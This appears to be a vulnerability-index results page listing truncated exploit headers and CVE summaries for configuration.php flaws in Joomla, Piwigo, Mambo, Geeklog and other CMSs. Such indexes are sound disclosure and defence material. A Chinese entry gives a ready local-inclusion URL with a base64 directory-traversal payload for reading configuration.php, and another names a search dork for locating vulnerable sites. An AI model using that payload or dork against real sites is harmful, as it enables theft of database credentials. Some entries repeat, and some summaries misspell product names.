Joomla! configuration.php file RCE vulnerability

Joomla! is an open source, cross-platform content management system CMS developed using PHP and MySQL. An RCE vulnerability exists in the Joomla! configuration.php file. An attacker can exploit the vulnerability to write a one-sentence Trojan horse and gain server privileges...

Joomla 3.4.6 Remote Code Execution

Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo @Hacktive Security Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on:...

Joomla 3.4.6 - (configuration.php) Remote Code Execution Exploit

Exploit for php platform in category web applications Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo @Hacktive Security Vendor Homepage: https//www.joomla.it/ Software Link:...

Joomla JS Jobs 1.2.6 Arbitrary File Delete

Exploit Title: Joomla! component comjsjobs 1.2.6 - Arbitrary File Deletion Dork: inurl:"index.php?option=comjsjobs" Date: 2019-08-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/5/download/1 Version: 1.2.6 Tested on: Debian/nginx/joomla...

CVE-2017-17823

The Configuration component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/configuration.php orderby array parameter. An attacker can exploit this to gain access to the data in a connected MySQL database...

Cross site request forgery (csrf)

admin/configuration.php in Piwigo 2.9.2 has CSRF...

CVE-2017-17774

admin/configuration.php in Piwigo 2.9.2 has CSRF...

CVE-2017-17774

admin/configuration.php in Piwigo 2.9.2 has CSRF...

Joomla! 3.4.6-3.4.x 目录遍历漏洞

本地包含： http://www.site.com/components/comdocman/dl2.php?archive=0&file=LDF 先通过本地包含漏洞查看物理路径，然后在configuration.php 数据库配置文件中，使用base64目录遍历payload 如： http://www.site.com/components/comdocman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==...

Joomla Fsave 2.0 Local File Disclosure

. | | / | | \ \ | | \ / | |\ / / /\ \ / \ | Y / ^ / / || / / / / /\ /\ \ \ \ | / \ / / \ | \ \ / // / \ / / / / Joomla = fsave Plugin Local File Disclosure Vulnerability My + Author : KnocKout Contact : [email protected] Skype : [email protected] HomePage : http://milw00rm.com -...

Elxis CMS 2009.2 - Remote file include vulnerbility

No description provided by source. \ \ \ / / / \ / / / |// / / // // / / / // // / // // / // // / //|| priasantai.uni.cc | team-elite.us elxis2009.2electrarev2631 === multiple Remote File Include Author : n0n0x Homepage: http://priasantai.uni.cc/ Download script :...

Design/Logic Flaw

Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, which allows local users to obtain the admin password hash by reading the file...

CVE-2013-2563

Mambo CMS 4.6.5 uses world-readable permissions on configuration.php, which allows local users to obtain the admin password hash by reading the file...

CVE-2013-2563

CVE-2013-2563 affects Mambo CMS 4.6.5. The issue is world-readable permissions on configuration.php, enabling local users to read the admin password hash. The connected documents confirm the affected product and the root cause, but do not provide a remediation or exploit details. Action: monitor ...

Cuppa CMS - alertConfigField.php LocalRemote File Inclusion

Cuppa CMS - alertConfigField.php LocalRemote File Inclusion Exploit Title : Cuppa CMS File Inclusion Date : 4 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.cuppacms.com/ Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppacms.zip...

Cross site scripting

Cross-site scripting XSS vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the subgroup parameter, a different vulnerability than CVE-2011-4942...

CVE-2011-5159

GeSleeklog (Geeklog) vulnerability in admin/configuration.php before 1.7.1sr1 allows remote XSS via the sub_group parameter. The issue is a distinct variant from CVE-2011-4942 and arises in the subgroup parameter handling, potentially enabling script insertion. Redhat/NVD entries confirm similar ...

CVE-2011-4942

Geekslog’s admin/configuration.php is affected by XSS in multiple inputs (1) subgroup and (2) conf_group in Geeklog before 1.7.1sr1. The root cause is insufficient input sanitization allowing remote attackers to inject arbitrary HTML/script. Impact is limited to web context and requires user-orig...

CVE-2011-5159

Cross-site scripting XSS vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the subgroup parameter, a different vulnerability than CVE-2011-4942...

PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution

Exploit for php platform in category web applications ?php / +------------------------------------------------------------------+ + PHP SQL Server MSSQL Query Analyzer Remote Code Execution + +------------------------------------------------------------------+ Web-App : PHP SQL Server MSSQL Query...